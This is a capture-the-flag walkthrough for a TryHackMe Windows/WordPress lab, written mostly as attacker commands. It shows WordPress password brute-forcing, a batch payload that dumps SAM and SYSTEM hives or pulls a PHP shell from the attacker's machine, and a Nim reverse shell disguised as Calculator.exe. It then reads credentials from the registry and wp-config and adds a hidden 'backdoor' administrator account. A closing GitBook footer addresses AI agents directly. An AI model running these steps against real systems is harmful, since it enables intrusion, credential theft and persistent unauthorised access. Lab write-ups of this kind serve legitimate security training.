> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/avenger.md). # AVenger **Room Link:** **Scans** Initial scan **Kali** ``` nmap -A $VICTIM ```

Longer scan **Kali** ``` nmap -sV -sT -O -p 1-65535 $VICTIM ```

### **TCP/80 - HTTP** **Find Pages** There were too many 404 and 403 in the scan so I changed to ffuf to ignore them. **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ``` **Kali** ``` ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt ```

The gift folder takes us to avenger.tryhackme

**Add hostname to host file** **Kali** ``` echo $VICTIM avenger.tryhackme >> /etc/hosts cat /etc/hosts ```

**Kali** ``` ffuf -u http://avenger.tryhackme/gift/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt ``` **Kali** ``` wpscan --url http://avenger.tryhackme/gift --enumerate p ```

**Bruteforce admin page** **Kali** ``` wpscan --url http://avenger.tryhackme/gift --passwords /usr/share/wordlists/rockyou.txt ``` ## Initial Shell

**Kali** ``` git clone https://github.com/flozz/p0wny-shell.git cd p0wny-shell/ subl exploit.bat ``` **exploit.bat**

@echo off

:: Check if the current user is NT AUTHORITY\SYSTEM
whoami /groups | find "S-1-5-18" > nul

if %errorlevel% equ 0 (
    :: Run commands for NT AUTHORITY\SYSTEM
    reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak
    reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak
) else (
    :: Run commands for other users
    curl http://$KALI:82/shell.php -o C:\xampp\htdocs\shell.php
)

I tried bypassing the file type restriction with the shell above, I could see the bat file running by seeing that it try to grab the shell.php file but I couldn't find a place to save the file where I could also see it on the website. **Kali** ``` python2 -m SimpleHTTPServer 82 ```

Nim reverse shell worked because they accept exe files **Kali**

git clone https://github.com/Sn1r/Nim-Reverse-Shell.git
cd Nim-Reverse-Shell/
apt install mingw-w64 -y

**Kali** ``` curl https://nim-lang.org/choosenim/init.sh -sSf | sh ``` **Kali** ``` subl rev_shell.nim ```

**Kali #1** ``` /root/.nimble/bin/nim c -d:mingw --app:gui --opt:speed -o:Calculator.exe rev_shell.nim ```

**Kali #2** ``` rlwrap nc -lvnp 443 ```

## **Privilege Esclation** Found some credentials. **Victim** ``` type C:\xampp\htdocs\gift\wp-config.php ```

From my computer I could access the mysql. **Kali** ``` apt install mysql-client-core-5.7 mysql -h$VICTIM -ugift -pSurpriseMF ``` I was able to find a password but couldn't crack it **Kali(mysql)** ``` select * from mysql -h$VICTIM -ugift -pSurpriseMF use gift; show tables; select * from wp_users; ```

I found a password **Victim** ``` reg query HKLM /f password /t REG_SZ /s ```

**Kali** ``` remmina Username: hugo Password: SurpriseMF123! ```

I can run a administrator shell from the GUI

**Victim** ``` net user backdoor pass!123 /add net localgroup Administrators "Remote Desktop Users" backdoor /add reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f ``` **Kali** ``` remmina Username: backdoor Password: pass!123 ```

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/avenger.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.